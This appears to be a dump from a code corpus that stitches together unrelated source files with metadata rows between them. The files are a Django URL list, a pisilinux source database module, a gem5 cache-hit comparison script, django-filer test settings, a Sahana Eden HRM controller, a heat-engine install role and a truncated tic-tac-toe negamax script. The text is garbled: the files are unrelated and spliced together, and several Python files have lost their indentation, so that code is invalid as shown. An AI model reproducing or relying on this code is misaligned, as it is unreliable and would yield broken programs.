url(r'^search/movie/(?P<option>\w+)', 'core.views.movie_search', name='movie_search'),
url(r'^filter', 'core.views.movie_filter'),
url(r'^filter/short', 'core.views.movie_filter'),
url(r'^info/director/(?P<code>\d+)', 'core.views.director_info'),
url(r'^info/actor/(?P<code>\d+)', 'core.views.actor_info'),
url(r'^info/movie/(?P<code>\d+)', 'core.views.movie_info'),
#url(r'autocomplete/', include('autocomplete_light.urls')),
# Uncomment the admin/doc line below to enable admin documentation:
# url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
# url(r'^admin/', include(admin.site.urls)),
)
| mit | 7,963,817,386,544,378,000 | 42.883333 | 98 | 0.62384 | false |
hknyldz/pisitools | pisilinux/pisilinux/db/sourcedb.py | 1 | 4805 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2005 - 2011, TUBITAK/UEKAE
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 2 of the License, or (at your option)
# any later version.
#
# Please read the COPYING file.
#
import re
import gzip
import piksemel
import pisilinux
import pisilinux.specfile
import pisilinux.db.lazydb as lazydb
class SourceDB(lazydb.LazyDB):
def __init__(self):
lazydb.LazyDB.__init__(self, cacheable=True)
def init(self):
self.__source_nodes = {}
self.__pkgstosrc = {}
self.__revdeps = {}
repodb = pisilinux.db.repodb.RepoDB()
for repo in repodb.list_repos():
doc = repodb.get_repo_doc(repo)
self.__source_nodes[repo], self.__pkgstosrc[repo] = self.__generate_sources(doc)
self.__revdeps[repo] = self.__generate_revdeps(doc)
self.sdb = pisilinux.db.itembyrepo.ItemByRepo(self.__source_nodes, compressed=True)
self.psdb = pisilinux.db.itembyrepo.ItemByRepo(self.__pkgstosrc)
self.rvdb = pisilinux.db.itembyrepo.ItemByRepo(self.__revdeps)
def __generate_sources(self, doc):
sources = {}
pkgstosrc = {}
for spec in doc.tags("SpecFile"):
src_name = spec.getTag("Source").getTagData("Name")
sources[src_name] = gzip.zlib.compress(spec.toString())
for package in spec.tags("Package"):
pkgstosrc[package.getTagData("Name")] = src_name
return sources, pkgstosrc
def __generate_revdeps(self, doc):
revdeps = {}
for spec in doc.tags("SpecFile"):
name = spec.getTag("Source").getTagData("Name")
deps = spec.getTag("Source").getTag("BuildDependencies")
if deps:
for dep in deps.tags("Dependency"):
revdeps.setdefault(dep.firstChild().data(), set()).add((name, dep.toString()))
return revdeps
def list_sources(self, repo=None):
return self.sdb.get_item_keys(repo)
def which_repo(self, name):
return self.sdb.which_repo(self.pkgtosrc(name))
def which_source_repo(self, name):
source = self.pkgtosrc(name)
return source, self.sdb.which_repo(source)
def has_spec(self, name, repo=None):
return self.sdb.has_item(name, repo)
def get_spec(self, name, repo=None):
spec, repo = self.get_spec_repo(name, repo)
return spec
def search_spec(self, terms, lang=None, repo=None, fields=None, cs=False):
"""
        fields (dict) : looks for terms in the fields which are marked as True
        If fields is None, this method will search in all fields
        example :
        if fields is equal to : {'name': True, 'summary': True, 'desc': False}
        this method will return only packages that contain the terms in the
        package name or summary
"""
resum = '<Summary xml:lang=.(%s|en).>.*?%s.*?</Summary>'
redesc = '<Description xml:lang=.(%s|en).>.*?%s.*?</Description>'
if not fields:
fields = {'name': True, 'summary': True, 'desc': True}
if not lang:
lang = pisilinux.pxml.autoxml.LocalText.get_lang()
found = []
for name, xml in self.sdb.get_items_iter(repo):
if terms == [term for term in terms if (fields['name'] and \
re.compile(term, re.I).search(name)) or \
(fields['summary'] and \
re.compile(resum % (lang, term), 0 if cs else re.I).search(xml)) or \
(fields['desc'] and \
re.compile(redesc % (lang, term), 0 if cs else re.I).search(xml))]:
found.append(name)
return found
def get_spec_repo(self, name, repo=None):
src, repo = self.sdb.get_item_repo(name, repo)
spec = pisilinux.specfile.SpecFile()
spec.parse(src)
return spec, repo
def pkgtosrc(self, name, repo=None):
return self.psdb.get_item(name, repo)
def get_rev_deps(self, name, repo=None):
try:
rvdb = self.rvdb.get_item(name, repo)
except Exception: #FIXME: what exception could we catch here, replace with that.
return []
rev_deps = []
for pkg, dep in rvdb:
node = piksemel.parseString(dep)
dependency = pisilinux.dependency.Dependency()
dependency.package = node.firstChild().data()
if node.attributes():
attr = node.attributes()[0]
dependency.__dict__[attr] = node.getAttribute(attr)
rev_deps.append((pkg, dependency))
return rev_deps
| gpl-3.0 | -6,640,202,832,901,699,000 | 35.12782 | 98 | 0.589802 | false |
bcheung92/Paperproject | gem5/pyscript/cachecmp.py | 1 | 2915 | #!/usr/bin/env python
import sys
import re
import os
inFilename = sys.argv[1]
if os.path.isfile(inFilename):
namelength = inFilename.rfind(".")
name = inFilename[0:namelength]
exten = inFilename[namelength:]
outFilename = name+"-cachecmp"+exten
print "inFilename:", inFilename
print "outFilename:", outFilename
fpRead = open(inFilename, "r")
fpWrite = open(outFilename, "w+")
dtbwalker1Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus0.dtb.walker).* ([0-9]+)')
dtbwalker2Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus1.dtb.walker).* ([0-9]+)')
itbwalker1Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus0.itb.walker).* ([0-9]+)')
itbwalker2Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus1.itb.walker).* ([0-9]+)')
overallhitsPattern = re.compile(r'.*(l2.overall_hits::total).* ([0-9]+)')
cachehitsPattern = re.compile(r'.*(l2.cachehits).* ([0-9]+)')
threadbeginPattern = re.compile(r'.*Begin Simulation Statistics.*')
    threadendPattern = re.compile(r'.*End Simulation Statistics.*')
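    # The gem5 stats.txt input is assumed to contain per-sample blocks bracketed by
    # "Begin/End Simulation Statistics" markers, with lines such as (illustrative):
    #   system.l2.overall_hits::total    123456
    #   system.l2.cachehits              123000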
lines = fpRead.readline()
while lines:
threadbeginmatch = threadbeginPattern.match(lines)
if threadbeginmatch:
dtbwalker1=0
itbwalker1=0
dtbwalker2=0
itbwalker2=0
overallhits=0
cachehits=0
gem5hits=0
ratio = 0
threadlines = fpRead.readline()
while threadlines:
dtbwalker1match = dtbwalker1Pattern.search(threadlines)
itbwalker1match = itbwalker1Pattern.search(threadlines)
dtbwalker2match = dtbwalker2Pattern.search(threadlines)
itbwalker2match = itbwalker2Pattern.search(threadlines)
overallhitsmatch = overallhitsPattern.search(threadlines)
cachehitsmatch = cachehitsPattern.search(threadlines)
threadendmatch = threadendPattern.match(threadlines)
if dtbwalker1match:
dtbwalker1=int(dtbwalker1match.group(2))
if itbwalker1match:
itbwalker1=int(itbwalker1match.group(2))
if dtbwalker2match:
dtbwalker2=int(dtbwalker2match.group(2))
if itbwalker2match:
itbwalker2=int(itbwalker2match.group(2))
if overallhitsmatch:
overallhits=int(overallhitsmatch.group(2))
if cachehitsmatch:
cachehits=int(cachehitsmatch.group(2))
if threadendmatch:
gem5hits=overallhits-(dtbwalker1+dtbwalker2+itbwalker1+itbwalker2)
absval = abs(gem5hits-cachehits)
if gem5hits!=0:
ratio=(absval/float(gem5hits))*100
else:
ratio=float(0)
fpWrite.write("gem5hit %d " % gem5hits)
fpWrite.write("cachehit %d " % cachehits)
fpWrite.write("ratio %.2f%%" % ratio)
fpWrite.write("\n")
break
threadlines = fpRead.readline()
lines = fpRead.readline()
fpRead.close()
fpWrite.close()
| mit | 374,115,436,903,597,250 | 37.866667 | 90 | 0.651115 | false |
pbs/django-filer | filer/test_settings.py | 1 | 2981 | # -*- coding: utf-8 -*-
import os
import filer
DEBUG = True
PACKAGE_ROOT = os.path.abspath(os.path.join(
os.path.dirname(filer.__file__), '..'))
TMP_ROOT = os.path.abspath(os.path.join(PACKAGE_ROOT, 'tmp'))
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(TMP_ROOT, 'filer_test.sqlite3'),
},
}
INSTALLED_APPS = [
'filer',
'mptt',
'easy_thumbnails',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sites',
'django.contrib.admin',
'django.contrib.sessions',
'django.contrib.staticfiles',
'cms',
'menus',
'sekizai',
'cmsroles',
]
ROOT_URLCONF = 'filer.test_urls'
SITE_ID = 1
MEDIA_ROOT = os.path.abspath(os.path.join(TMP_ROOT, 'media'))
MEDIA_URL = '/media/'
STATIC_URL = '/static/'
USE_TZ = False # because of a bug in easy-thumbnails 1.0.3
MIDDLEWARE_CLASSES = (
'django.middleware.cache.UpdateCacheMiddleware',
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'cms.middleware.user.CurrentUserMiddleware',
)
CMS_TEMPLATES = [('cms_mock_template.html', 'cms_mock_template.html')]
SEKIZAI_IGNORE_VALIDATION = True
CMS_MODERATOR = True
CMS_PERMISSION = True
CACHE_BACKEND = 'locmem:///'
SECRET_KEY = 'secret'
TEST_RUNNER = 'django.test.runner.DiscoverRunner'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'OPTIONS': {
'context_processors': (
"django.contrib.auth.context_processors.auth",
'django.contrib.messages.context_processors.messages',
"django.template.context_processors.i18n",
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.template.context_processors.media",
'django.template.context_processors.csrf',
"cms.context_processors.media",
"sekizai.context_processors.sekizai",
"django.template.context_processors.static",
),
'loaders': (
'filer.tests.utils.MockLoader',
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
),
'debug': False
},
},
]
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'simple': {
'format': '%(levelname)s %(module)s %(message)s'
},
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'formatter': 'simple'
},
},
'root': {
'handlers': ['console', ],
'level': 'WARNING',
},
}
| bsd-3-clause | -3,890,502,775,433,293,300 | 27.122642 | 70 | 0.598792 | false |
ScottBuchanan/eden | controllers/hrm.py | 1 | 25684 | # -*- coding: utf-8 -*-
"""
Human Resource Management
"""
module = request.controller
resourcename = request.function
if not settings.has_module(module):
raise HTTP(404, body="Module disabled: %s" % module)
s3db.hrm_vars()
# =============================================================================
def index():
""" Module Home Page """
mode = session.s3.hrm.mode
if mode is not None:
# Go to Personal Profile
s3_redirect_default(URL(f="person"))
else:
# Bypass home page & go direct to searchable list of Staff
s3_redirect_default(URL(f="staff", args="summary"))
# =============================================================================
# People
# =============================================================================
def human_resource():
"""
HR Controller
- combined Staff/Volunteers
Used for Summary view, Imports and S3AddPersonWidget2
"""
return s3db.hrm_human_resource_controller()
# -----------------------------------------------------------------------------
def staff():
""" Staff Controller """
# Staff only
s3.filter = FS("type") == 1
def prep(r):
table = r.table
tablename = r.tablename
get_vars = r.get_vars
# Use CRUD strings for staff
crud_strings = s3.crud_strings
crud_strings[tablename] = crud_strings["hrm_staff"]
resource = r.resource
if "expiring" in get_vars:
# Filter for staff with contracts expiring in the next 4 weeks
query = FS("end_date") < \
(request.utcnow + datetime.timedelta(weeks=4))
resource.add_filter(query)
# Adapt CRUD strings
crud_strings[tablename].title_list = \
T("Staff with Contracts Expiring in the next Month")
# Reconfigure
resource.configure(# Sort by Expiry
sortby = table.end_date,
# Remove the Add button
insertable=False
)
# Adapt list_fields
list_fields = [(T("Contract End Date"), "end_date"),
"person_id",
"job_title_id",
"organisation_id",
"department_id",
"site_id",
#"site_contact",
]
else:
# Adapt list_fields
list_fields = ["person_id",
"job_title_id",
"organisation_id",
"department_id",
"site_id",
#"site_contact",
(T("Email"), "email.value"),
(settings.get_ui_label_mobile_phone(), "phone.value"),
]
if settings.get_hrm_use_trainings():
list_fields.append("person_id$training.course_id")
if settings.get_hrm_use_certificates():
list_fields.append("person_id$certification.certificate_id")
list_fields.append((T("Contract End Date"), "end_date"))
list_fields.append("status")
resource.configure(list_fields = list_fields)
if r.interactive:
if r.id:
if r.method not in ("profile", "delete"):
# Redirect to person controller
vars = {
"human_resource.id": r.id,
"group": "staff"
}
args = []
if r.representation == "iframe":
vars["format"] = "iframe"
args = [r.method]
redirect(URL(f="person", vars=vars, args=args))
else:
if r.method == "import":
# Redirect to person controller
redirect(URL(f="person",
args="import",
vars={"group": "staff"}))
elif not r.component and r.method != "delete":
# Configure site_id
field = table.site_id
site_id = get_vars.get("site_id", None)
if site_id:
field.default = site_id
field.writable = False
field.comment = DIV(DIV(_class="tooltip",
_title="%s|%s" % (
settings.get_org_site_label(),
T("The facility where this position is based."),
#messages.AUTOCOMPLETE_HELP,
)))
#field.comment = S3AddResourceLink(c="org", f="facility",
# vars = dict(child="site_id",
# parent="req"),
# title=T("Add New Site"),
# )
# Hide status field
table.status.writable = table.status.readable = False
# Assume staff only between 16-81
s3db.pr_person.date_of_birth.widget = S3DateWidget(past=972,
future=-192)
elif r.representation == "xls":
# Make it match Import sheets
list_fields = s3db.get_config(tablename, "list_fields")
            # Remove "id": the XLS exporter expects it to be the first column and otherwise needs complicated skipping routines
try:
list_fields.remove("id")
except ValueError:
pass
# Separate Facility Type from Facility Name
table.site_id.represent = s3db.org_SiteRepresent(show_type = False)
i = 0
for f in list_fields:
i += 1
if f == "site_id":
break
list_fields.insert(i,
(T("Facility Type"),
"person_id$human_resource.site_id$instance_type"))
# Split person_id into first/middle/last
try:
list_fields.remove("person_id")
except ValueError:
pass
list_fields = ["person_id$first_name",
"person_id$middle_name",
"person_id$last_name",
] + list_fields
s3db.configure(tablename,
list_fields = list_fields)
return True
s3.prep = prep
def postp(r, output):
if r.interactive:
if not r.component:
# Set the minimum end_date to the same as the start_date
s3.jquery_ready.append(
'''S3.start_end_date('hrm_human_resource_start_date','hrm_human_resource_end_date')''')
s3_action_buttons(r, deletable=settings.get_hrm_deletable())
if "msg" in settings.modules and \
settings.get_hrm_compose_button() and \
auth.permission.has_permission("update", c="hrm", f="compose"):
# @ToDo: Remove this now that we have it in Events?
s3.actions.append(
{"url": URL(f="compose",
vars = {"human_resource.id": "[id]"}),
"_class": "action-btn send",
"label": str(T("Send Message"))
})
#s3.scripts.append("/%s/static/scripts/jquery.doubleScroll.js" % appname)
#s3.jquery_ready.append('''$('.dataTable_table').doubleScroll()''')
#s3.jquery_ready.append('''$('.dataTables_wrapper').doubleScroll()''')
elif r.representation == "plain":
# Map Popups
output = s3db.hrm_map_popup(r)
return output
s3.postp = postp
return s3_rest_controller("hrm", "human_resource")
# -----------------------------------------------------------------------------
def person():
"""
Person Controller
- used for access to component Tabs, Personal Profile & Imports
- includes components relevant to HRM
"""
return s3db.hrm_person_controller()
# -----------------------------------------------------------------------------
def profile():
"""
Profile Controller
- includes components relevant to HRM
"""
request.args = [str(s3_logged_in_person())]
# Custom Method for Contacts
s3db.set_method("pr", resourcename,
method = "contacts",
action = s3db.pr_Contacts)
if settings.has_module("asset"):
# Assets as component of people
s3db.add_components("pr_person",
asset_asset = "assigned_to_id",
)
group = get_vars.get("group", "staff")
# Configure human resource table
tablename = "hrm_human_resource"
table = s3db[tablename]
table.type.default = 1
# Configure person table
tablename = "pr_person"
table = s3db[tablename]
s3db.configure(tablename,
deletable = False,
)
# Configure for personal mode
s3.crud_strings[tablename].update(
title_display = T("Personal Profile"),
title_update = T("Personal Profile"))
# CRUD pre-process
def prep(r):
if r.interactive and r.method != "import":
if r.component:
if r.component_name == "physical_description":
# Hide all but those details that we want
# Lock all the fields
table = r.component.table
for field in table.fields:
table[field].writable = table[field].readable = False
# Now enable those that we want
table.ethnicity.writable = table.ethnicity.readable = True
table.blood_type.writable = table.blood_type.readable = True
table.medical_conditions.writable = table.medical_conditions.readable = True
table.other_details.writable = table.other_details.readable = True
else:
table = r.table
table.pe_label.readable = table.pe_label.writable = False
table.missing.readable = table.missing.writable = False
table.age_group.readable = table.age_group.writable = False
# Assume volunteers only between 12-81
table.date_of_birth.widget = S3DateWidget(past=972, future=-144)
return True
else:
# Disable non-interactive & import
return False
s3.prep = prep
# CRUD post-process
def postp(r, output):
if r.interactive and r.component:
if r.component_name == "human_resource":
# Set the minimum end_date to the same as the start_date
s3.jquery_ready.append(
'''S3.start_end_date('hrm_human_resource_start_date','hrm_human_resource_end_date')''')
if r.component_name == "experience":
# Set the minimum end_date to the same as the start_date
s3.jquery_ready.append(
'''S3.start_end_date('hrm_experience_start_date','hrm_experience_end_date')''')
return output
s3.postp = postp
output = s3_rest_controller("pr", "person",
rheader = s3db.hrm_rheader,
)
return output
# -----------------------------------------------------------------------------
def hr_search():
"""
Human Resource REST controller
- limited to just search_ac for use in Autocompletes
- allows differential access permissions
"""
# Filter
group = get_vars.get("group", None)
if group == "staff":
s3.filter = FS("human_resource.type") == 1
elif group == "volunteer":
s3.filter = FS("human_resource.type") == 2
s3.prep = lambda r: r.method == "search_ac"
return s3_rest_controller("hrm", "human_resource")
# -----------------------------------------------------------------------------
def person_search():
"""
Person REST controller
- limited to just search_ac for use in Autocompletes
- allows differential access permissions
"""
# Filter
group = get_vars.get("group", None)
if group == "staff":
s3.filter = FS("human_resource.type") == 1
elif group == "volunteer":
s3.filter = FS("human_resource.type") == 2
s3.prep = lambda r: r.method == "search_ac"
return s3_rest_controller("pr", "person")
# =============================================================================
# Teams
# =============================================================================
def group():
"""
Team controller
- uses the group table from PR
"""
return s3db.hrm_group_controller()
# -----------------------------------------------------------------------------
def group_membership():
"""
Membership controller
- uses the group_membership table from PR
"""
# Change Labels & list_fields
s3db.hrm_configure_pr_group_membership()
# Only show Relief Teams
# Do not show system groups
# Only show Staff
table = db.pr_group_membership
gtable = db.pr_group
htable = s3db.hrm_human_resource
s3.filter = (gtable.system == False) & \
(gtable.group_type == 3) & \
(htable.type == 1) & \
(htable.person_id == table.person_id)
def prep(r):
if r.method in ("create", "create.popup", "update", "update.popup"):
# Coming from Profile page?
person_id = get_vars.get("~.person_id", None)
if person_id:
field = table.person_id
field.default = person_id
field.readable = field.writable = False
return True
s3.prep = prep
output = s3_rest_controller("pr", "group_membership",
csv_template="group_membership",
csv_stylesheet=("hrm", "group_membership.xsl"),
)
return output
# =============================================================================
# Jobs
# =============================================================================
def department():
""" Departments Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
if not auth.s3_has_role(ADMIN):
s3.filter = auth.filter_by_root_org(s3db.hrm_department)
output = s3_rest_controller()
return output
# -----------------------------------------------------------------------------
def job_title():
""" Job Titles Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
s3.filter = FS("type").belongs((1, 3))
if not auth.s3_has_role(ADMIN):
s3.filter &= auth.filter_by_root_org(s3db.hrm_job_title)
output = s3_rest_controller()
return output
# =============================================================================
# Skills
# =============================================================================
def skill():
""" Skills Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# -----------------------------------------------------------------------------
def skill_type():
""" Skill Types Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# -----------------------------------------------------------------------------
def competency_rating():
""" Competency Rating for Skill Types Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# -----------------------------------------------------------------------------
def skill_provision():
""" Skill Provisions Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# -----------------------------------------------------------------------------
def course():
""" Courses Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
if not auth.s3_has_role(ADMIN):
s3.filter = auth.filter_by_root_org(s3db.hrm_course)
output = s3_rest_controller(rheader=s3db.hrm_rheader)
return output
# -----------------------------------------------------------------------------
def course_certificate():
""" Courses to Certificates Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# -----------------------------------------------------------------------------
def certificate():
""" Certificates Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
if settings.get_hrm_filter_certificates() and \
not auth.s3_has_role(ADMIN):
s3.filter = auth.filter_by_root_org(s3db.hrm_certificate)
output = s3_rest_controller(rheader=s3db.hrm_rheader)
return output
# -----------------------------------------------------------------------------
def certificate_skill():
""" Certificates to Skills Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# -----------------------------------------------------------------------------
def training():
""" Training Controller - used for Searching for Participants """
s3.filter = FS("person_id$human_resource.type") == 1
return s3db.hrm_training_controller()
# -----------------------------------------------------------------------------
def training_event():
""" Training Events Controller """
return s3db.hrm_training_event_controller()
# -----------------------------------------------------------------------------
def credential():
""" Credentials Controller """
s3.filter = FS("person_id$human_resource.type") == 1
return s3db.hrm_credential_controller()
# -----------------------------------------------------------------------------
def experience():
""" Experience Controller """
s3.filter = FS("person_id$human_resource.type") == 1
return s3db.hrm_experience_controller()
# -----------------------------------------------------------------------------
def competency():
"""
RESTful CRUD controller used to allow searching for people by Skill
"""
s3.filter = FS("person_id$human_resource.type") == 1
field = s3db.hrm_competency.person_id
field.widget = S3PersonAutocompleteWidget(ajax_filter = "~.human_resource.type=1")
return s3db.hrm_competency_controller()
# =============================================================================
def skill_competencies():
"""
Called by S3OptionsFilter to provide the competency options for a
particular Skill Type
"""
table = s3db.hrm_skill
ttable = s3db.hrm_skill_type
rtable = s3db.hrm_competency_rating
query = (table.id == request.args[0]) & \
(table.skill_type_id == ttable.id) & \
(rtable.skill_type_id == table.skill_type_id)
records = db(query).select(rtable.id,
rtable.name,
orderby=~rtable.priority)
response.headers["Content-Type"] = "application/json"
return records.json()
# =============================================================================
def staff_org_site_json():
"""
Used by the Asset - Assign to Person page
"""
table = s3db.hrm_human_resource
otable = s3db.org_organisation
query = (table.person_id == request.args[0]) & \
(table.organisation_id == otable.id)
records = db(query).select(table.site_id,
otable.id,
otable.name)
response.headers["Content-Type"] = "application/json"
return records.json()
# =============================================================================
def staff_for_site():
"""
Used by the Req/Req/Create page
- note that this returns Person IDs
"""
try:
site_id = request.args[0]
except:
result = current.xml.json_message(False, 400, "No Site provided!")
else:
table = s3db.hrm_human_resource
ptable = db.pr_person
query = (table.site_id == site_id) & \
(table.deleted == False) & \
(table.status == 1) & \
((table.end_date == None) | \
(table.end_date > request.utcnow)) & \
(ptable.id == table.person_id)
rows = db(query).select(ptable.id,
ptable.first_name,
ptable.middle_name,
ptable.last_name,
orderby=ptable.first_name)
result = []
append = result.append
for row in rows:
append({"id" : row.id,
"name" : s3_fullname(row)
})
result = json.dumps(result)
response.headers["Content-Type"] = "application/json"
return result
# =============================================================================
# Salaries
# =============================================================================
def staff_level():
""" Staff Levels Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
def salary_grade():
""" Salary Grade Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# =============================================================================
# Insurance Information
# =============================================================================
def insurance():
""" Insurance Information Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# =============================================================================
# Awards
# =============================================================================
def award_type():
""" Award Type Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
def award():
""" Awards Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# =============================================================================
# Disciplinary Record
# =============================================================================
def disciplinary_type():
""" Disciplinary Type Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
def disciplinary_action():
""" Disciplinary Action Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# =============================================================================
# Messaging
# =============================================================================
def compose():
""" Send message to people/teams """
return s3db.hrm_compose()
# END =========================================================================
| mit | -650,041,428,619,606,000 | 32.312581 | 111 | 0.455108 | false |
cloudnull/genastack_roles | genastack_roles/heat_engine/__init__.py | 1 | 1045 | # =============================================================================
# Copyright [2013] [Kevin Carter]
# License Information :
# This software has no warranty, it is provided 'as is'. It is your
# responsibility to validate the behavior of the routines and its accuracy
# using the code provided. Consult the GNU General Public license for further
# details (see GNU General Public License).
# http://www.gnu.org/licenses/gpl.html
# =============================================================================
BUILD_DATA = {
'heat_engine': {
'help': 'Install heat-engine from upstream',
'required': [
'python',
'heat',
'heat_client'
],
'init_script': [
{
'help': 'Start and stop heat-engine on boot',
'init_path': '/etc/init.d',
'name': 'heat-engine',
'chuid': 'heat',
'chdir': '/var/lib/heat',
'program': 'heat-engine'
}
]
}
}
| gpl-3.0 | -6,973,453,614,583,198,000 | 33.833333 | 79 | 0.449761 | false |
anuragxel/ultimate-tic-tac-toe | xxx.py | 1 | 9042 | #!/usr/bin/python
#
# Negamax variant of minmax
#
# This program is for demonstration purposes, and contains ample
# opportunities for speed and efficiency improvements.
#
# Also, a minmax tree is not the best way to program a tic-tac-toe
# player.
#
# This software is hereby granted to the Public Domain
#
import sys,os
import random
import numpy as np
import json
# from_file=np.genfromtxt("foo.csv",delimiter=",")
# all_state=np.array(from_file).tolist()
# print states
# for i in from_file:
# all_state.append(i)
INFINITY=99999999
def numStr(n):
if n == INFINITY: return "+INFINITY"
elif n == -INFINITY: return "-INFINITY"
return str(n)
def write_to_file():
global states
global f
json.dump(states,f)
f.close()
#print states
# final_add = []
# # print states
# # print all_state
# print to_print
# for e in all_state:
# if e not in final_add:
# final_add.append(e)
# np.savetxt("foo.csv",final_add,delimiter=",")
#-------------------------------------------------------------------
class MinMax(object):
def __init__(self, maxdepth=INFINITY):
self.bestmove = -1
self.maxdepth = maxdepth
def _buildtree_r(self, playboard, curplayer, depth):
"""Recursively build the minmax tree."""
# figure out the value of the board:
if depth > self.maxdepth: return 0 # who knows what the future holds
if curplayer == Board.X:
otherplayer = Board.O
else:
otherplayer = Board.X
winner = playboard.getWinner()
if winner == curplayer:
return INFINITY
elif winner == otherplayer:
return -INFINITY
elif playboard.full():
return 0 # tie game
# get a list of possible moves
movelist = playboard.getCandidateMoves()
alpha = -INFINITY
# for all the moves, recursively rate the subtrees, and
# keep all the results along with the best move:
salist = []
for i in movelist:
# make a copy of the board to mess with
board2 = playboard.copy()
board2.move(curplayer, i) # make the speculative move
subalpha = -self._buildtree_r(board2, otherplayer, depth+1)
if alpha < subalpha:
alpha = subalpha;
# keep a parallel array to the movelist that shows all the
# subtree values--we'll chose at random one of the best for
# our actual move:
if depth == 0: salist.append(subalpha)
# if we're at depth 0 and we've explored all the subtrees,
# it's time to look at the list of moves, gather the ones
# with the best values, and then choose one at random
# as our "best move" to actually really play:
if depth == 0:
candidate = []
board_state=''
for i in range(len(salist)):
if salist[i] == alpha:
candidate.append(movelist[i])
#print("Best score: %s Candidate moves: %s" % (numStr(alpha), candidate))
self.bestmove = random.choice(candidate)
# all_state.append(self.bestmove)
board_state=playboard.get_board_values()
states[board_state]=self.bestmove
return alpha
def buildtree(self, board, curplayer):
self.bestmove = -1
alpha = self._buildtree_r(board, curplayer, 0)
return self.bestmove
#-------------------------------------------------------------------
class Board(list):
"""Holds a complete board in self, row-major order."""
NONE = 0
X = 1
O = 2
def __init__(self):
for i in range(9): self.append(Board.NONE)
def copy(self):
"""Clone a board."""
b = Board()
for i in range(9):
b[i] = self[i]
return b
def move(self, color, pos):
"""Fill a position on the board."""
self[pos] = color
def getCandidateMoves(self):
"""Get a list of free moves."""
clist = []
for i in range(9):
if self[i] == Board.NONE:
clist.append(i)
return clist
def full(self):
"""Returns true if the board is full."""
for i in range(9):
if self[i] == Board.NONE:
return False
return True
def _check(self, a, b, c):
if self[a] == self[b] and self[a] == self[c] and self[a] != Board.NONE:
return self[a]
return Board.NONE
def getWinner(self):
"""Figure out who the winner is, if any."""
winner = self._check(0,1,2)
if winner != Board.NONE: return winner
winner = self._check(3,4,5)
if winner != Board.NONE: return winner
winner = self._check(6,7,8)
if winner != Board.NONE: return winner
winner = self._check(0,3,6)
if winner != Board.NONE: return winner
winner = self._check(1,4,7)
if winner != Board.NONE: return winner
winner = self._check(2,5,8)
if winner != Board.NONE: return winner
winner = self._check(0,4,8)
if winner != Board.NONE: return winner
winner = self._check(2,4,6)
if winner != Board.NONE: return winner
return Board.NONE
def get_board_values(self):
r=''
for i in range(9):
if self[i] == Board.NONE:
#r += '%d' % i
r = r+ '-'
elif self[i] == Board.X:
r = r + 'x'
elif self[i] == Board.O:
r = r+ 'o'
# if i == 2:
# r += '| 0 1 2\n%s\n' % blank
# if i == 5:
# r += '| 3 4 5\n%s\n' % blank
# if i == 8:
# r += '| 6 7 8\n%s\n' % blank
return r
def __str__(self):
""" Pretty-print the board."""
blank = '+-+-+-+'
r = blank + '\n'
for i in range(9):
r += '|'
if self[i] == Board.NONE:
#r += '%d' % i
r += ' '
elif self[i] == Board.X:
r += 'X'
elif self[i] == Board.O:
r += 'O'
if i == 2:
r += '| 0 1 2\n%s\n' % blank
if i == 5:
r += '| 3 4 5\n%s\n' % blank
if i == 8:
r += '| 6 7 8\n%s\n' % blank
return r
#-------------------------------------------------------------------
# MAIN:
# make the real board we'll be using
def main():
global f
global states
f = open('foo.csv','r+')
